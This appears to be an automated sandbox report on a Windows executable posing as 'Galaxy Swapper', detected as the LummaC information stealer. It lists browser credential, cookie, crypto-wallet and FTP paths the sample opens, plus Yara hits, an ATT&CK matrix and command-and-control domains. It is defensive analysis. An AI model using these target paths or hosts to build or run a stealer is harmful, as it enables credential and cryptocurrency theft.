Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior

Source: Yara match	File source: 00000001.00000003.1043714845.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Galaxy Swapper v2.0.3.exe PID: 6516, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Galaxy Swapper v2.0.3.exe PID: 6516, type: MEMORYSTR
Source: Yara match	File source: 1.2.Galaxy Swapper v2.0.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Galaxy Swapper v2.0.3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2172856527.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Galaxy Swapper v2.0.3.exe	45%	Virustotal		Browse
Galaxy Swapper v2.0.3.exe	39%	ReversingLabs	Win32.Trojan.Generic
Galaxy Swapper v2.0.3.exe	100%	Avira	TR/AVI.PWS.Agent.pjgxt

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://citydisco.bet/l	0%	Avira URL Cloud	safe
https://citydisco.bet:443/gdJIS	100%	Avira URL Cloud	malware
https://citydisco.bet/gdJISG:	0%	Avira URL Cloud	safe
https://citydisco.bet/I	0%	Avira URL Cloud	safe
https://citydisco.bet/	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISAAAA	0%	Avira URL Cloud	safe
https://citydisco.bet:443/gdJISocal	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISB0	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISs	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJIS	100%	Avira URL Cloud	malware
https://citydisco.bet/gdJIS::	0%	Avira URL Cloud	safe
https://citydisco.bet/$	0%	Avira URL Cloud	safe
https://citydisco.bet/e	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISH	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJIS:1	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJIS:2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
citydisco.bet	188.114.97.3	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
mrodularmall.top/aNzS	false		high
bugildbett.top/bAuz	false		high
jowinjoinery.icu/bdWUa	false		high
legenassedk.top/bdpWO	false		high
citydisco.bet/gdJIS	false		high
featureccus.shop/bdMAn	false		high
htardwarehu.icu/Sbdsa	false		high
https://citydisco.bet/gdJIS	false	Avira URL Cloud: malware	unknown
cjlaspcorne.icu/DbIps	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet/l	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet:443/gdJIS	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1755160197.0000000001464000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126504400.0000000001463000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000002.2174098985.0000000001466000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISB0	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISAAAA	Galaxy Swapper v2.0.3.exe, 00000001.00000003.984625942.0000000001523000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.985846572.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.986063272.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.985574597.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.984899629.0000000001509000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Galaxy Swapper v2.0.3.exe, 00000001.00000003.1011284498.0000000003CF0000.00000004.00000800.00020000.00000000.sdmp	false		high
